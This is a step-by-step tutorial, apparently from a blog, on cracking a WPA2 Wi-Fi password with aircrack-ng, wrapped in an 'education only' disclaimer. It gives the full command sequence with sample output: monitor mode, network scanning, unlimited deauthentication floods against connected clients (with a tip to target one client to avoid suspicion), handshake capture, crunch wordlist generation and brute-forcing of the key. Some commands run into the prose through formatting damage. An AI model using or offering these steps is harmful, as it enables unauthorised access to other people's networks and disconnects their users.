In this article, I am going to teach you how to hack Wi-Fi password using AirCrack-NG.
NOTE: The purpose of presenting this article is only for education and our goal is to improve the level of your network security knowledge. Any illegal use is the responsibility of the user and the author of this article does not accept any responsibility for illegal use.
In this tutorial, we will teach you how to get the password of a wireless network, our goal is only to secure our own wireless network and the organization we work in.
One of the most important things in securing wireless networks is its password. In all WiFi hacking tools and wireless networks, there is no way other than cracking the WiFi password. Therefore, in order to increase the security of our network, we must use strong and complex passwords. Of course, in hacking wireless networks, there is another way besides using hacking tools, you can also use social engineering, or even a combination of them! You will notice this in the final stages of cracking the Wi-Fi password.
- Analyze the wireless networks around you
- Kick people from inside the wireless network
- Dump data in transit (wireless eavesdropping)
- Crack the password of a wireless network
- A Linux operating system (Debian based, Kali Linux or Ubuntu or ...)
- Wireless network card (monitoring mode support)
- Internet access to install the necessary packages (in Kali Linux and Parrot OS, it is normally installed and does not require Internet access)
- Little knowledge of Linux
In the first step, you need a Debian base Linux operating system, if you use Kali Linux and parrot os, you don't need to access the Internet. In order to analyze the networks around you, you need to have a network card that supports monitoring mode (I will explain later how to find out if our network card supports monitoring mode), and finally a little knowledge of Linux (just to better understand the commands)
NOTE: If you are using a virtual machine, the network card must be physically connected, for this, enter its settings and look for an option related to 'physical connection' in the section of your network card, if you do not find it You can search about it on Google
NOTE: In all these steps, if you use the commands I put there and it doesn't work and you get an error, search the troubleshooting sites based on your operating system.
-
NOTE: If you are using Kali Linux or Parrot OS, or if the necessary packages are already installed. There is no need to repeat this step
NOTE: I am using Ubuntu 20.04 operating system. If the instructions for installing the packages do not work for you, you can search for the necessary instructions for your operating system on the Internet.
Log in as the root user with the following command:
$ sudo -iInstall the aircrack-ng package:
# apt update # apt install -y aircrack-ng
If you do not encounter an error in this step, you can go to the next step
-
Connect your wireless network card to the device (if it is not onboard)
Then, see the information of the network cards by entering the
iwconfigcommand:root@ubuntu:~# iwconfig lo no wireless extensions. eno1 no wireless extensions. wlp3s0 IEEE 802.11 Mode:Master Tx-Power=15 dBm Retry short limit:7 RTS thr:off Fragment thr:off Power Management:on
Note that all network cards whose names start with
ware wireless network cards (of course, except for virtual network cards which can be of any form)For example, I have a wireless network card named
wlp3s0. Remember this name, we have a lot to do with it later.Currently, my network card is on Master mode (can be network card mode on other modes). In order to continue the work, we must put the network card on Monitor mode:
# airmon-ng start [NETWORK-CARD-NAME]Replace
[NETWORK-CARD-NAME]with the name of your network cardAfter executing the above command, it is possible that the name of your network card will change, so get the name of your network card again with
iwconfigcommand and remember it.NOTE: If after executing
iwconfigcommand, you see that your network card mode is not set to Monitor, then your network card does not support Monitor mode. -
Use the following command to analyze nearby wireless networks:
# airodump-ng [NETWORK-CARD-NAME]Output will look like this:
CH 1 ][ Elapsed: 6 s ][ 2023-03-17 11:58 BSSID PWR Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID 78:C3:E9:EB:AB:BE -21 33 0 0 11 65 WPA2 CCMP PSK MJscript 18:A6:F7:62:2C:67 -70 21 2 0 6 130 WPA2 CCMP PSK <length: 0> BSSID STATION PWR Rate Lost Frames Notes Probes D8:47:32:86:33:E8 86:40:4C:FE:A1:CB -55 0e- 0e 0 283 18:A6:F7:62:2C:67 EA:AA:AC:9E:22:C1 -68 0 - 0e 2 4
The first table shows the wireless networks and the second table shows the clients connected to them. We only need a few columns of the first table:
- BSSID: MAC address of the wireless network
- ESSID: The display name of the wireless network (if its value was
<length: 0>, it means that it is hidden, when we take a dump from that network, its name will be recognized) - CH: Wireless network working channel
The target of our attack is the
MJScriptwireless network. To better analyze this network, we need to do a more detailed search, so we enter the following command to do this:
# airodump-ng -c [WIFI-CHANNEL] -d [WIFI-BSSID] -w [OUTPUT-PATH] [NETWORK-CARD-NAME]Replace
[WIFI-CHANNEL]with theCHcolumn value,[WIFI-BSSID]with theBSSIDcolumn value, and[OUTPUT-PATH]with the desired output path.For example, it went like this for me:
root@ubuntu:~# airodump-ng -c 11 -d 78:C3:E9:EB:AB:BE -w /home/ubuntu/wifi wlp3s0mon CH 11 ][ Elapsed: 6 s ][ 2023-03-17 12:36 BSSID PWR RXQ Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID 78:C3:E9:EB:AB:BE -20 100 81 95 38 11 65 WPA2 CCMP PSK MJscript BSSID STATION PWR Rate Lost Frames Notes Probes 78:C3:E9:EB:AB:BE 64:66:B3:1E:5B:A7 -38 0e-24 3123 106
This is the same as the previous two tables, with the difference that it is only related to a wireless network and the data is dumped to the path we have given it.
Currently, the data moving in this network is being recorded, but we cannot find the password of the target wireless network by any means, because the connection between them has already been established. So we have to wait for an authentic person who has the password to connect to it (we call the operation of connecting to the wireless network handshake), but this may take time, so we do it in another way. We can send a signal with our WiFi adapter that the client's credentials have been invalidated in the network and work to re-do the handshake.
NOTE: The terminal contains the previous command to dump the handshake and should not be closed, only close the process when the handshake is done.
Next, open a new terminal and enter the following commands there.
We can use the following command to send the invalidation signal to all clients in the network:
# aireplay-ng --deauth 0 -a [WIFI-BSSID] [NETWORK-CARD-NAME]In the above command, an unlimited number of credit invalidation signals will be sent to all clients in that network.
But one question, isn't it suspicious that all clients in a network are suddenly disconnected? Well, we can work on only one of them, using the MAC address of the clients that is in the
STATIONcolumn of the second table, with the following command, this operation will be done on only one of the clients:# aireplay-ng --deauth 0 -a [WIFI-BSSID] -c [CLIENT-STATION] [NETWORK-CARD-NAME]Replace
[CLIENT-STATION]with the MAC address of the client.NOTE: The number zero means an unlimited number of signals, you can change it and specify any number you want.
After sending the signal a few times, you can close its process.
After a few seconds after closing the process of sending the signal, it will be changed in the first terminal in the first line as follows:
CH 11 ][ Elapsed: 12 s ][ 2023-03-17 13:42 ][ WPA handshake: 78:C3:E9:EB:AB:BEYou can see that
WPA handshake: 78:C3:E9:EB:AB:BEvalue is added to the end of the line. It means that the handshake was done on the78:C3:E9:EB:AB:BEnetwork (which, of course, will show you the address of another network)Now the handshake we needed is there and you can close the network dump process.
-
Before you brute force, you should have a file that contains passwords to test.
In the introduction, I mentioned that you can do this hack with social engineering, but you may not be successful, so you can use the data you obtained to create a professional password list for that network. Multiply the probability of its password being cracked.
If you don't have a password list and you want to have a password list of all keyboard characters, you can do it with the following command:
NOTE: This tool may not be installed, so you can install this tool with
apt install crunchcommand. # crunch [MIN-SIZE] [MAX-SIZE] "[CHARACTERS]" > [OUTPUT-FILE]Replace
[MIN-SIZE]with the minimum password size,[MAX-SIZE]with the maximum password size,[CHARACTERS]with the characters in the password, and[OUTPUT-FILE]with the file storage path.NOTE: Since the password of wireless networks cannot be less than 8 characters, so consider the
[MIN-SIZE]value to be 8 or more.After creating the list password, you can crack the password with the following command:
# aircrack-ng [CAP-FILE] -w [PASSLIST-FILE]Replace
[CAP-FILE]with the cap extension file in the dump process output and[PASSLIST-FILE]with the address of the password list file.If the password is found, you will see the following output:
root@ubuntu:~# aircrack-ng /home/ubuntu/wifi-01.cap -w /home/ubuntu/passlist Aircrack-ng 1.6 [00:00:00] 2/2 keys tested (22.82 k/s) Time left: -- KEY FOUND! [ 1234567890# ] Master Key : B9 1B C6 AE 10 59 44 4A 4E CB EC D9 36 A3 79 86 DE F8 EB CE 93 0B 22 D1 97 43 4F B5 FC C5 A5 B2 Transient Key : AD 7D 3D 82 1A D2 CE 37 08 43 E9 4C 94 75 36 D7 67 7D 48 A6 5F 70 77 CE 83 C9 63 BE C3 61 FC A7 75 98 EB 09 B6 C1 B7 58 0F B6 0E 69 6F 81 60 5D 29 FC 1C E6 35 B3 BF 77 2D 59 6C BF 50 6D 4A 85 EAPOL HMAC : D4 BB C7 04 C7 C8 61 11 14 8B 3D 03 3B 04 28 E4
After these long steps, we finally managed to get the Wi-Fi password.
-
Enter the following command to exit the monitoring mode:
# airmon-ng stop [NETWORK-CARD-NAME]
Together we were able to hack a wireless network (Broadforce method) offline. My purpose of this training is only to raise your scientific level and I hope you will pay attention to my warnings and not cause trouble :)